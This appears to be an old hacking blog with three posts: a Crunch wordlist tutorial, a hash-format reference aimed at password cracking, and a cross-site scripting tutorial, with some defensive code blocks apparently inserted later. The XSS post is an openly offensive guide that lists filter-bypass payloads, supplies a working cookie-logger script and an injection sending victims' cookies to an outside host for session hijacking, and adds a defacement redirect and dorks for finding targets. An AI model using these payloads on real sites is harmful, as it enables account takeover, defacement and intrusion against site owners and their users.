Wednesday, August 29, 2012

Wordlists manipulation and generation with Backtrack 5R2 Crunch application






Brief Introduction:

OK. This tutorial introduces a Backtrack application called Crunch.
Put simply, Crunch is a wordlist generator. In this tutorial I'm going to explain some of its main options (not all of them), how to use it, charsets, pros and cons and, of course, where it might come in handy.


I. How to install

First you'll need Backtrack, of course; you can run it in a virtual machine such as VMware or VirtualBox. I will not cover how to boot Backtrack, there are already plenty of tutorials for that.

I assume most people here know how to run applications in Ubuntu, but I've nevertheless included an installation section for those who aren't familiar with Unix-based OSs and live CD distributions.

Open up a terminal and type:

Code:
wget http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.2.tgz



Once downloaded, extract it:



Code:
tar xvf crunch-3.2.tgz

Accessing directory:

Code:
cd crunch3.2/

Compiling and installing:

Code:
make
make install





II. How to use


Once installed we can start generating our wordlists.

Basic usage:


Code:
./crunch [minimum length] [maximum length]  [charset / options]

For example:

Code:
./crunch 1 5 abc123 -o wordlist.txt

This will generate every combination of the characters "a, b, c, 1, 2, 3" with a minimum length of 1 and a maximum of 5. The -o [file] option saves all generated combinations to a file.

Also, when writing out the charset, special characters must be escaped with a backslash "\".

For example:

Code:
./crunch 1 5 abc\!\*\( -o wordlist.txt


Permutations:

Permutations can be created with the -p switch, applied to words, letters, numbers or symbols.

For example:

Code:
./crunch 1 1 -p example of permutation


One thing you might have noticed is that the min/max length arguments are given again: even for a permutation they must be supplied, otherwise crunch won't run.

In that example we used 3 words, giving a permutation of three, i.e. P3 = 3*2*1 = 6 possible combinations (without any repetition).

Splitting generated combinations into separate lists with predefined size:

For this we use the -b switch, which sets the maximum size of each output file. Whenever the generated output exceeds the limit, say 10mb, crunch continues writing the following combinations to a new file.

For example:

Code:
./crunch 1 8 abcdABCD -b 30mb -o START


This writes all combinations of "a, b, c, d, A, B, C, D" to separate files, none of them exceeding 30mb.
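The arithmetic behind those commands, as an added example (not part of the original tutorial and not crunch's own code): it computes how many candidates a charset and length range produce and how many bytes they take on disk, which is what decides whether a given password policy is exhaustible at all, enumerates them in odometer order (shortest first, characters in the order given), and shows how a -b style size cap splits the output into files. The function names are this example's own and the charset is assumed to contain no repeated characters.

```python
import itertools
from typing import Iterable, Iterator, List, Tuple


def keyspace(charset: str, min_len: int, max_len: int) -> Tuple[int, int]:
    """Return (candidate_count, bytes_on_disk) for every string over `charset`
    with length min_len..max_len, written one per line.  For the tutorial's
    `1 5 abc123` this is 6 + 6**2 + ... + 6**5 = 9330 lines, 54120 bytes."""
    c = len(charset)                       # assumes no repeated characters
    count = sum(c ** n for n in range(min_len, max_len + 1))
    size = sum(c ** n * (n + 1) for n in range(min_len, max_len + 1))  # +1: newline
    return count, size


def candidates(charset: str, min_len: int, max_len: int) -> Iterator[str]:
    """Yield every candidate: shortest length first, then counting through
    the characters in the order given, i.e. abc123 -> a, b, c, 1, 2, 3, aa, ab, ..."""
    for n in range(min_len, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            yield "".join(tup)


def split_by_size(lines: Iterable[str], max_bytes: int) -> List[List[str]]:
    """Group lines into files none of which exceeds max_bytes, the way the -b
    switch does.  A new file is started as soon as the next line would not
    fit; a single line longer than max_bytes still gets a file of its own."""
    files: List[List[str]] = [[]]
    used = 0
    for line in lines:
        n = len(line.encode()) + 1         # bytes including the newline
        if files[-1] and used + n > max_bytes:
            files.append([])
            used = 0
        files[-1].append(line)
        used += n
    return files


if __name__ == "__main__":
    count, size = keyspace("abc123", 1, 5)       # the tutorial's first example
    print(f"{count} candidates, {size} bytes")   # 9330 candidates, 54120 bytes
    parts = split_by_size(candidates("abcdABCD", 1, 4), 4096)
    print(f"{len(parts)} files of at most 4096 bytes")
```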

For all options and full usage of crunch visit its man page.

Hope this tutorial comes in handy for members!

-------------------------------

I decided this thread would be a suitable place to include a small project of mine written in PHP. It's again for wordlist generation, although PHP is not the best language for that.

PHP Code:
<?php
// Raise the time limit: enumerating and echoing every string of length 0..6
// over a 6-character charset takes a while.
ini_set('max_execution_time', '65');
$values = 'ABCDEF';

container(strlen($values), 0);

// Recursively extend $out by one character from $values per level until
// $pos reaches the charset length, then print the accumulated string.
// Every prefix (including the empty one) is printed exactly once.
function container($length, $pos, $out = '') {
    global $values;

    for ($i = 0; $i < $length; ++$i) {
        if ($pos < $length) {
            container($length, $pos + 1, $out . $values[$i]);
        }
    }

    if (strlen($out) <= 6) {
        echo $out . '<br />';
    }
}
?>

Anyone experiencing problems with the code, or wanting me to explain something, may feel free to post a reply to the tutorial.


Thanks for reading!

Hashing Algorithms and Types



DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), followed by the actual hash.
Notes: [1] [2]

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching Windows domain passwords.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
Note: [1]

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, followed by the salt (up to 8 random characters; in our example the salt is the string "12345678"), then another $ character, followed by the actual hash.
Algorithm: A loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, followed by the salt (up to 8 random characters; in our example the salt is the string "12345678"), then another $ character, followed by the actual hash.
Algorithm: A loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, followed by one character (most often the digit '9'), then the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: A loop calling the MD5 algorithm 2048 times.
Notes: [1] [2]

MD5(Wordpress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, followed by one character (most often the letter 'B'), then the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: A loop calling the MD5 algorithm 8192 times.
Notes: [1] [2]

MySQL
Example: 606717496665bcba
Used in old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in newer versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded into the program without the asterisk at the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla versions below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News and Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]

SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9zYE1v0
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, followed by the salt (up to 8 random characters; in our example the salt is the string "12345678"), then another $ character, followed by the actual hash.
Algorithm: A loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3reMXY3doKEuxrcDohKUx0Oxf44aeTIxGEjssvtT1aKyZHjs
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, followed by the salt (up to 8 random characters; in our example the salt is the string "12345678"), then another $ character, followed by the actual hash.
Algorithm: A loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]

SHA-1(Django) = sha1($salt.$pass)
Example: sha1$12345678$90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b
12345678 is the salt (in hexadecimal format).
90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b is the SHA-1 hash.

SHA-256(Django) = SHA-256($salt.$pass)
Example: sha256$12345678$154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b
12345678 is the salt (in hexadecimal format).
154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b is the SHA-256 hash.

SHA-384(Django) = SHA-384($salt.$pass)
Example: sha384$12345678$c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5
12345678 is the salt (in hexadecimal format).
c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5 is the SHA-384 hash.

SHA-1(ManGOS) = sha1(strtoupper($username).':'.$pass)

SHA-1(ManGOS2) = sha1($username.':'.$pass)

MD5(Custom) = '=='.md5(md5(md5($pass).md5($pass).md5($pass).md5($pass)))

md5(3 x strtoupper(md5($pass))) = md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($pass)))))))

MD5(ZipMonster) = 50000 x strtoupper(md5(strtoupper($pass)))

------------------------------------------------- 

Notes:

[1] Since the hashing requires not only a password but also a salt (or a user name) that is unique to each user, the attack speed for such hashes declines in proportion to their count (for example, attacking 100 hashes is 100 times slower than attacking one hash).

[2] The hash is to be loaded into the program in full, into the "Hash" column; the program automatically extracts the salt and other required data from it.

[3] The ':' character can be used as a salt; however, since PasswordsPro uses it by default to separate hash and salt, it is recommended to use a different field separator, e.g. a space.

[4] A salt can contain special characters (single or double quotes, as well as backslash) which, in dumps obtained from MySQL databases, are preceded by an additional backslash that must be removed manually. For example, the salt to be loaded into the program would be a'4 instead of a\'4, a"4 instead of a\"4, and a\4 instead of a\\4.
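As an added example (not part of the original reference list), a small identifier for the formats catalogued above: it uses the signatures described ($1$, $apr1$, $H$, $P$, $5$, $6$, Django's algorithm$salt$hash, MySQL5's leading asterisk, and a bare hex digest with or without a trailing ":salt") to split a stored value into scheme, salt and digest, and spells out the nesting notation (md5($salt.$pass) and friends) as functions so the way a password is processed under each scheme can be checked. The names are this example's own; the unsalted MD5, md5(md5) and SHA-1 examples above are the digests of the password "1", which the checks below reproduce.

```python
import hashlib
import re
from typing import Callable, Dict, NamedTuple, Optional


class ParsedHash(NamedTuple):
    scheme: str
    salt: Optional[str]
    digest: str


# Signatures as described above.  Order matters: the more specific prefixed
# formats are tried before the bare hex digests.
_MODCRYPT = re.compile(r"^\$(?P<id>1|apr1|5|6)\$(?P<salt>[^$]{1,8})\$(?P<hash>[./0-9A-Za-z]+)$")
_PHPASS = re.compile(r"^\$(?P<id>[HP])\$(?P<cost>.)(?P<salt>.{8})(?P<hash>[./0-9A-Za-z]{22})$")
_DJANGO = re.compile(r"^(?P<id>sha1|sha256|sha384)\$(?P<salt>[^$]*)\$(?P<hash>[0-9a-f]+)$")
_MYSQL5 = re.compile(r"^\*(?P<hash>[0-9A-F]{40})$")
_HEX_SALT = re.compile(r"^(?P<hash>[0-9a-f]{32}|[0-9a-f]{40}):(?P<salt>.+)$")
_HEX = re.compile(r"^(?P<hash>[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$")

_MODCRYPT_NAMES = {"1": "MD5(Unix)", "apr1": "MD5(APR)", "5": "SHA-256(Unix)", "6": "SHA-512(Unix)"}
_HEX_NAMES = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}


def identify(stored: str) -> ParsedHash:
    """Split a stored credential into (scheme, salt, digest) by its signature."""
    if m := _MODCRYPT.match(stored):
        return ParsedHash(_MODCRYPT_NAMES[m["id"]], m["salt"], m["hash"])
    if m := _PHPASS.match(stored):
        name = "MD5(phpBB3)" if m["id"] == "H" else "MD5(Wordpress)"
        return ParsedHash(name, m["salt"], m["hash"])
    if m := _DJANGO.match(stored):
        algo = m["id"].upper().replace("SHA", "SHA-")       # sha256 -> SHA-256
        return ParsedHash(f"{algo}(Django)", m["salt"], m["hash"])
    if m := _MYSQL5.match(stored):
        return ParsedHash("MySQL5", None, m["hash"])
    if m := _HEX_SALT.match(stored):
        return ParsedHash(f"{_HEX_NAMES[len(m['hash'])]} with salt", m["salt"], m["hash"])
    if m := _HEX.match(stored):
        # A bare, unsalted fast digest: the weakest storage form in the list.
        return ParsedHash(_HEX_NAMES[len(m["hash"])], None, m["hash"])
    raise ValueError(f"unrecognised hash format: {stored!r}")


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def _sha1(s: str) -> str:
    return hashlib.sha1(s.encode()).hexdigest()


# The nesting notation used in the list above, as functions of (password, salt).
NESTED: Dict[str, Callable[[str, str], str]] = {
    "md5($pass)": lambda p, s: _md5(p),
    "sha1($pass)": lambda p, s: _sha1(p),
    "md5(md5($pass))": lambda p, s: _md5(_md5(p)),
    "md5($pass.$salt)": lambda p, s: _md5(p + s),
    "md5($salt.$pass)": lambda p, s: _md5(s + p),
    "md5(md5($pass).$salt)": lambda p, s: _md5(_md5(p) + s),
    "md5(md5($salt).md5($pass))": lambda p, s: _md5(_md5(s) + _md5(p)),
    "md5($salt.md5($salt.$pass))": lambda p, s: _md5(s + _md5(s + p)),
    "sha1($salt.sha1($salt.sha1($pass)))": lambda p, s: _sha1(s + _sha1(s + _sha1(p))),
}


def verify(stored: str, scheme: str, password: str) -> bool:
    """Recompute `scheme` over the candidate password and the stored salt and
    compare it with the stored digest (the check a login routine performs)."""
    parsed = identify(stored)
    return NESTED[scheme](password, parsed.salt or "") == parsed.digest.lower()


if __name__ == "__main__":
    for sample in ("$1$12345678$XM4P3PrKBgKNnTaqG9P0T/",
                   "$H$9123456785DAERgALpsri.D9z3ht120",
                   "6011527690eddca23580955c216b1fd2:wQ6"):
        print(identify(sample))
    print(verify("c4ca4238a0b923820dcc509a6f75849b", "md5($pass)", "1"))  # True
```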

Tuesday, August 28, 2012

Full Ultimate Cross-Site Scripting (XSS) Tutorial





Hello and thanks for reading this tutorial on XSS, written by me. You may be asking why I'm creating this tutorial. My inbox has lately been flooding, and I've received a lot of requests to make this tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and other huge sites. I've even exploited HackForums' security with XSS.


What is XSS?

XSS stands for Cross-Site Scripting. It is basically an attack that is used to execute HTML and Javascript on a web page. The attack is carried out by submitting queries into text boxes, or even into the URL. The result comes back with the text read as HTML, so the scripts are executed instead of being displayed as plain text. With an XSS attack you can steal cookies from a web administrator, or use some social engineering to manipulate someone into downloading a virus that you've created, such as a botnet, RAT or even a keylogger. XSS can be very dangerous, but it can also be very mild. Most of my attacks are mild XSS attacks, which can be difficult to use against a website. There are many ways to use XSS to your advantage; I will name a few examples. You can use an alert box to advertise yourself, or to alert the web admin that you've discovered a security breach involving XSS. You can also set up a cookie stealer/logger. Anything you can do with HTML can be used against a site with this attack. I will explain some of the most important terms associated with XSS.

What is HTML and Javascript?

HTML
HTML is sort of like a programming language; the distinction between a programming language and HTML is not that large. They are both languages used to create attributes and events. HTML is a markup language, used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons and other things that can be used in a web page. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.

Javascript
Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java is a language that resembles C++; it can be used in games and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in web pages as HTML is; it is used more in applications outside of web pages, like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.

XSS: My first attack.
Now, let's start getting into the really good stuff. In this section I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS; if you know the basics of XSS you can skip this section, because I doubt you will learn anything you don't already know.

Now, our first step is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is that it can take time to determine whether the site is really vulnerable. With SQLi you can just add a little '. But with XSS you must (sometimes) submit multiple queries to test the site for XSS.

Most vulnerable sites will contain a Search, Login or Register area. Pretty much anywhere that contains a text box can be exploited with XSS. HOWEVER, many people forget this fact and never use it to its full potential because they think it's useless. You can exploit XSS through the source as well. You can't just take any script and edit the whole thing, but editing an "onmouseover" script is definitely an exception. I will be explaining this method of XSS later on; for now, we need the complete basics.

Anyway, our site should have some text boxes to input some HTML into. I will simply be using a search bar.

So, let's try putting in the most well-known, BASIC query of all time.


Code:
<script>alert("XSS")</script>

That little script is HTML. It will make a little message pop up saying "XSS". You can edit that part if you like, just don't edit any other part of the script. Put that into your search bar and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because it means the site has taken some time to put in a filter. A filter is a mini process that every search goes through, basically an inspection: it checks for anything malicious (dangerous), in this case XSS. Sometimes these filters are very weak and can be bypassed very easily; other times they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time it is blocking the alert. Here's an example of this kind of filter:


Code:
<script>alert("XSS")</script>


Code:
<script>alert( > XSS DETECTED < )</script>

It will block the quotes. So how the hell do we get past that? Well, thankfully there's a way to encode the full message :). We will be using a little function called "String.fromCharCode". The name pretty much explains it all: it builds our text from ASCII character codes. An example of this encoding would look like this:


Code:
String.fromCharCode(88,83,83)

Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:


Code:
<script>alert(String.fromCharCode(88,83,83))</script>

You do NOT need ANY quotes in a simple query like that. So let's put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get an alert box, try some of these queries that I like to use:


Code:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))


Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.


XSS: Advanced Methods

Now, in this section I will be sharing some ways to use XSS maliciously against a site. Keep in mind that all malicious attacks sent to a system, site or server are illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you just want to make a little alert box pop up, you shouldn't need a Proxy/VPN.

Cookie Stealing/Logging

Now, cookie stealing is about the most malicious thing we can do with non-persistent XSS. A cookie stealer/logger logs the cookies of the users who access the page to a certain document. The easiest way to do this is a three-step process.

First, you should set up a site. Personally, I find http://www.000webhost.com/ the best for uploading malicious code, programs or anything else. So go ahead and register there.

Now, once you've created your site, go to the file manager and create a new file called "CookieLog.txt"; leave it blank. After that, create another file called "CookieLogger.php". In CookieLogger.php we need to add some code so that it writes the cookies we log into our cookie log. Add this code into it (just make sure the file name ends in .php, or else the PHP code will not run, which is an enormous problem).


Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

<?php
}
?>


Now that we have our cookie logger script, we can send it to our best friend, the web admin :). To do this, we should probably Tiny the URL, or if you can figure out how to spoof the URL, that will work too.

To Tiny the URL, go to http://www.spam.com/ and just put in the URL. But hold on, we need to add a script into our XSS vulnerability first. This is the script that will start our cookie logging.


Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

So just add that script after the URL, then tiny it and send it to our web admin. It can take some time for the admin to actually click it; sometimes the admin won't click it at all, so if it takes too long you should just give up and find another way to exploit it.

Once you get the cookie, you can use the "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrator's session. I find Cookie Manager a very useful app for XSS; make sure to download it.


Defacing

Defacing is one of the most common things people like to do when they have access to multiple administrator options, mostly so that they can advertise themselves and simply let the administrator know that their security has been breached. Anyway, defacing with XSS requires persistent XSS, maybe a comment box or something. You can use this script to create a redirect to your deface page (you should probably redirect to your deface on Pastehtml.com, because it allows anonymous uploading).


Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>

XSS: Javascript Events

Onmouseover isn't a very exploitable vulnerability, but it is still considered XSS. An onmouseover vulnerability would look something like this:


Code:
onmouseover=prompt1337

We can exploit this, by editing it to:


Code:
onmouseover=alert("XSS")

Very basic vulnerability, but it's getting noticed and patched on a lot more websites. Most sites use Adobe Flash or CSS for those kinds of effects now.


XSS Filter Bypassing Techniques

Sometimes a simple XSS query just won't do the trick. The reason your query isn't working is that the website has a WAF or filter in place. A filter will block as many XSS and SQLi queries as it can; in this case we're dealing with XSS.

There are many ways of bypassing XSS filters, but I will only explain a few.



Hex Bypassing

With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution :) You can write your characters in hex. The hex of a certain character is the same character in a different format. These should help you out:

> = %3e
< = %3c
/ = %2f



ASCII Bypassing

With ASCII encoding we can get around the character ", which is blocked quite a bit. This is one of the most common XSS filter bypasses of all time. A script that you would need to encode would look like this:

NOT WORKING SCRIPT


Code:
<script>alert("XSS")</script>

WORKING SCRIPT


Code:
<script>alert(String.fromCharCode(88,83,83))</script>

To encode your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site and find it quite useful.



Case-Sensitive Bypassing

This kind of bypass rarely works, but it's always worth a shot. Some filters are set up to detect certain strings, but the strings they block are CASE SENSITIVE. So all we need to do is execute a script with different letter cases. This bypass would look like this:


Code:
<ScRiPt>aLeRt("XSS")</ScRiPt>

You can also mix that with ASCII encoding if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones.
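As an added example (not from the original tutorial), here is why the filters in the ASCII and case-sensitive sections above are bypassable, and what fixes the class of bug rather than individual strings: the server encoding the reflected value for the HTML context it lands in. The filter is a reconstruction of the behaviour the tutorial describes (quoted strings replaced, the exact lower-case <script> tag removed), the probe strings are a sample of those listed above, and the function names are this example's own.

```python
import html
import re

# Constructed sample of the probe strings listed earlier in the tutorial.
PROBES = [
    '<script>alert("XSS")</script>',
    '<script>alert(String.fromCharCode(88,83,83))</script>',
    '<ScRiPt>aLeRt("XSS")</ScRiPt>',
    '"><script>alert(String.fromCharCode(88,83,83))</script>',
]


def blacklist_filter(user_input: str) -> str:
    """Reconstruction of the filter the tutorial describes: quoted strings are
    replaced with a marker and the exact lower-case <script> tags are removed.
    It looks for known tokens and knows nothing about where the value lands."""
    out = re.sub(r'"[^"]*"', " > XSS DETECTED < ", user_input)
    return out.replace("<script>", "").replace("</script>", "")


def html_encode(user_input: str) -> str:
    """Output encoding for HTML text and attribute values: &, <, >, " and '
    become entities, so the browser can only ever treat the value as data."""
    return html.escape(user_input, quote=True)


_TAG_START = re.compile(r"<[A-Za-z/]")


def breaks_text_context(value: str) -> bool:
    """In <p>Results for: VALUE</p>, a tag start in any letter case means the
    value has become markup (this is the case-variation bypass)."""
    return bool(_TAG_START.search(value))


def breaks_attribute_context(value: str) -> bool:
    """In <input value="VALUE">, a surviving raw double quote closes the
    attribute; a lone quote slips past a filter that only pairs them up."""
    return '"' in value


def render(term: str, sanitize) -> str:
    """The reflected search page, with the term echoed in both contexts."""
    safe = sanitize(term)
    return f'<p>Results for: {safe}</p>\n<input name="q" value="{safe}">'


def bypass_count(sanitize) -> int:
    """Number of (probe, context) pairs in which `sanitize` let the untrusted
    value break out of its context."""
    total = 0
    for probe in PROBES:
        safe = sanitize(probe)
        total += breaks_text_context(safe) + breaks_attribute_context(safe)
    return total


if __name__ == "__main__":
    print("blacklist bypasses:", bypass_count(blacklist_filter))   # 2
    print("encoding bypasses: ", bypass_count(html_encode))        # 0
    print(render(PROBES[2], html_encode))
```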



Some XSS Dorks

It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:


Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

